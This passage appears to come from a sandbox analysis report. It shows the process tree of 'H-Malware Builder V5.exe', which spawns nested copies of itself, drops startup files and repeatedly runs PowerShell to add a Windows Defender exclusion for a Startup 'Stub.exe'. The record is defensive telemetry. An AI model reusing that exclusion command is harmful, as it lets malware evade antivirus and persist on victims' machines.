                                                                                                            • Drops startup file
                                                                                                            PID:4444
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                              15⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:1764
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                16⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:2408
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                              15⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Drops startup file
                                                                                                              PID:5104
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                16⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:4540
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  17⤵
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:2332
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                16⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Drops startup file
                                                                                                                PID:3612
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                  17⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:2004
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    18⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:1880
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                  17⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Drops startup file
                                                                                                                  PID:3272
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                    18⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:1820
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      19⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:3500
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                    18⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Drops startup file
                                                                                                                    PID:3436
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                      19⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:1964
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        20⤵
                                                                                                                          PID:3032
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                        19⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Drops startup file
                                                                                                                        PID:4656
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                          20⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:3772
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                          20⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Drops startup file
                                                                                                                          PID:4772
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                            21⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:468
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              22⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:2660
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                            21⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Drops startup file
                                                                                                                            PID:5104
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                              22⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:2916
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                23⤵
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:1968
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                              22⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Drops startup file
                                                                                                                              PID:1128
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                23⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:2656
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  24⤵
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:4444
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                23⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Drops startup file
                                                                                                                                PID:1764
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                  24⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:1424
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    25⤵
                                                                                                                                      PID:4540
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                    24⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Drops startup file
                                                                                                                                    PID:4288
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                      25⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:2320
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        26⤵
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4356
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                      25⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Drops startup file
                                                                                                                                      PID:3144
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                        26⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:4448
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          27⤵
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:3996
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                        26⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Drops startup file
                                                                                                                                        PID:3760
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                          27⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:1048
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            28⤵
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2724
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                          27⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Drops startup file
                                                                                                                                          PID:2572
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                            28⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            PID:4932
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              29⤵
                                                                                                                                                PID:1932
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                              28⤵
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Drops startup file
                                                                                                                                              PID:2004
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                29⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:456
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  30⤵
                                                                                                                                                    PID:4448
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                  29⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Drops startup file
                                                                                                                                                  PID:2928
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                    30⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:5104
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      31⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:3252
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                    30⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Drops startup file
                                                                                                                                                    PID:1380
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                      31⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:212
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        32⤵
                                                                                                                                                          PID:968
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                        31⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Drops startup file
                                                                                                                                                        PID:2780
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                          32⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:1488
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            33⤵
                                                                                                                                                              PID:5052
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                            32⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Drops startup file
                                                                                                                                                            PID:2232
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                              33⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4520
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                34⤵
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:348
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                              33⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Drops startup file
                                                                                                                                                              PID:1128
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                34⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:1196
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  35⤵
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:1928
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                34⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Drops startup file
                                                                                                                                                                PID:5024
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                  35⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  PID:4848
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    36⤵
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:4436
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                  35⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  PID:2972
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                    36⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:3200
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      37⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:5100
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                    36⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Drops startup file
                                                                                                                                                                    PID:2912
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                      37⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:4420
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        38⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:2188
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                      37⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Drops startup file
                                                                                                                                                                      PID:3824
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                        38⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:612
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          39⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:4380
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                        38⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Drops startup file
                                                                                                                                                                        PID:4240
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                          39⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:4036
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                          39⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          PID:4664
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                            40⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:4512
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              41⤵
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:3708
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                            40⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Drops startup file
                                                                                                                                                                            PID:1992
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                              41⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:2836
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                42⤵
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:3532
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                              41⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              • Drops startup file
                                                                                                                                                                              PID:4708
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                42⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:4368
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  43⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:3772
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                42⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                PID:1968
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                  43⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:2684
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    44⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:3996
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                  43⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  PID:4276
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                    44⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:2332
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      45⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:3232
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
